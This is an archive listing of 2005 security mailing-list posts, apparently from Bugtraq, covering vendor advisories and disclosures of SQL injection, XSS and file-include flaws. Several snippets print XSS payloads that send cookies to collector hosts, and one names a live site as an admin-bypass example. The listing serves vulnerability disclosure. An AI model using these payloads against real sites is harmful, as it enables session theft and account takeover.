iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability
2005-08-29 iDEFENSE Labs (labs-no-reply idefense com)

BNBT EasyTracker Remote Denial of Service Vulnerability
2005-08-30 Sowhat . (smaillist gmail com)
BNBT EasyTracker Remote Denial of Service Vulnerability
by Sowhat
Last Update:2005.08.30
http://secway.org/advisory/AD20050830.txt
Vendor: http://bnbteasytracker.sourceforge.net/
Product Affected: 7.7r3.2004.10.27 and below
Overview: BNBT was written by Trevor Hogan. BNBT is a complete port

iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability
2005-08-29 iDEFENSE Labs (labs-no-reply idefense com)
Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability
iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=296&type=vulnerabilities
August 29, 2005
I. BACKGROUND
Adobe Version Cue is a software version tracking system for Adobe products distributed with Ad

SUSE Security Announcement: pcre integer overflows (SUSE-SA:2005:048)
2005-08-30 Marcus Meissner (meissner suse de)

SUSE Security Announcement: php4/php5 Pear::XML_RPC code injection and PCRE integer overflow problems (SUSE-SA:2005:049)
2005-08-30 Marcus Meissner (meissner suse de)

[SECURITY] [DSA 789-1] New PHP 4 packages fix several vulnerabilities
2005-08-29 joey infodrom org (Martin Schulze)

AutoLinks Pro 2.1
2005-08-28 none none com
[NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability
=============================================================================
Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risk: High
Date: 16.08.05
Vendor: ScriptsCenter
Page: http:/

Re: Sophos Antivirus Library Remote Heap Overflow
2005-08-28 list rem0te com
You are partially correct. Prior to this advisory, Sophos & rem0te agreed to w/hold details until all fixes were available (August 26th). The Sophos link you provided below does not disclose any details of the vulnerability - only the patch - which leaves a lot of people guessing about the actual vu

WASC-Articles: 'Preventing Log Evasion in IIS'
2005-08-29 contact webappsec org
The Web Application Security Consortium is proud to present 'Preventing Log Evasion in IIS', written by Robert Auger. In this paper Robert describes an issue which allows an attacker to evade multiple aspects of logging within an IIS server environment, as well as how to remediate the problem. This

PunBB BBCode IMG Tag Script Injection Vulnerability
2005-08-29 y3dips echo or id
ECHO_ADV_22$2005
---------------------------------------------------------------------------
PunBB BBCode IMG Tag Script Injection Vulnerability
---------------------------------------------------------------------------
Author: y3dips
Date: August, 20th 2005
Location: Indonesia, Jakar

Re: unload event in ie/mozilla/opera
2005-08-28 gegegz aol com
"that means you can "keep" the user on a site. when you type a new url in the address-bar, javascript overwrites it."
Annoying, but not very dangerous. When I type a new url, I get brought to a "file://localhost/[...]/unload.html". Then I type a new url, and that's ok. I wouldn't disable javascr

Vulnerability in Helpdesk software Hesk 0.92
2005-08-29 s2b hotmail com
By The Name Of Allah
Vulnerability in Helpdesk software Hesk ..
Vulnerability Type : Login into The Administrator Menu Without Password
Injected version : Helpdesk software Hesk 0.92
Vulnerability Example
http://www.springporttwppd.com/helpdesk/
add : admin.php
http://www.springporttwppd.com

[SECURITY] [DSA 788-1] New kismet packages fix arbitrary code execution
2005-08-29 joey infodrom org (Martin Schulze)

SimplePHPBlog Arbitrary File Deletion and Sample Exploit
2005-08-29 'ken'@FTU (ken ftusecurity com)
SimplePHPBlog has a vulnerability in its comment_delete_cgi.php. The PHP script allows for the arbitrary deletion of files. Please see following link for a perl script to demonstrate the exploit: http://www.ftusecurity.com/pub/sphpblog_vulns (Please add .pl extension as my ISP server preprocesses

Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities
2005-08-29 h4cky0u org gmail com
TITLE:
======
Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
Land Down Under version 801 and prior
Support Website : http://www.neocrome.net
INFO:
=====
Land Down Under is a multiple portal system which includes many dif

[cosmoshop <= 8.10.78] be the shopadmin in one step
2005-08-29 innate gmx de
author : l0om innate| @t | gmx.de WWW.EXCLUDED.ORG
product: cosmoshop
version: <= 8.10.78
problem: 1. sql injection 2. cleartext passwords 3. view any file
maunuf.: www.cosmoshop.de
what is cosmoshop
*****************
cosmoshop is a commercial shop system written as a CGI.
where is the pr

Multiple vulnerabilities in BFCommand & Control for Battlefield 1942 and Vietnam
2005-08-29 Luigi Auriemma (aluigi autistici org)

Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability
2005-08-29 Secunia Research (vuln secunia com)

PHP-Fusion <= v6.00.107 XSS exploit
2005-08-28 slacker4ever_1 juno com
Hello we have found a vulnerability in PHP-Fusion <=v6.00.107 which allows us to steal cookies. The exploit works because of badly coded bbcode. Well here is the exploit.
[URL=http://aaaaaa.com/UR[url=aa.com&& OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+c ookie; location=

Xcon2005 papers released
2005-08-29 alert7 (alert7 xfocus org)
hi all:
Xcon2005 closed successfully on Aug 20th, 2005
Those papers released in http://xcon.xfocus.org/
Chinese version papers in http://xcon.xfocus.net/
Hacking Windows CE -- by San
Windows Kernel Pool Overflow Exploitation -- by

Land Down Under
2005-08-28 bendeniz_avci hotmail com
Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci (at) hotmail (dot) com
LDU has some xss vulns
Firstly you can use html codes in your signature
you can get cookies with this
put your signature that code
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCR

RE: Sophos Antivirus Library Remote Heap Overflow
2005-08-27 Dowling, Gabrielle (dowlingg sullcrom com)
Sophos has had a fix for since August 5th... http://www.sophos.com/support/knowledgebase/article/3409.htmlj. The vulnerability was also publicly discussed prior to that time.
G
-----Original Message-----
From: list (at) rem0te (dot) com [mailto:list (at) rem0te (dot) com]
Sent: Friday, August 26, 2005 8:36

Re: Tool for Identifying Rogue Linksys Routers
2005-08-26 Mike Kershaw (dragorn kismetwireless net)
> > Is there a scanning tool out there that can determine if there are
> > unauthorized Linksys (type) routers in a specific VLAN?
>
> Try pinging all hosts using nmap:
>
> Then find MAC addresses that are from Linksys's space. I know macchanger
> [1] has a list of what addresses belong to which ve

MDKSA-2005:153 - Updated gnumeric packages fix integer overflow vulnerability
2005-08-26 Mandriva Security Team (security mandriva com)
iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=297&type=vulnerabilities
August 29, 2005
I. BACKGROUND
Adobe Version Cue is a software version tracking system for Adobe
products distributed with Ado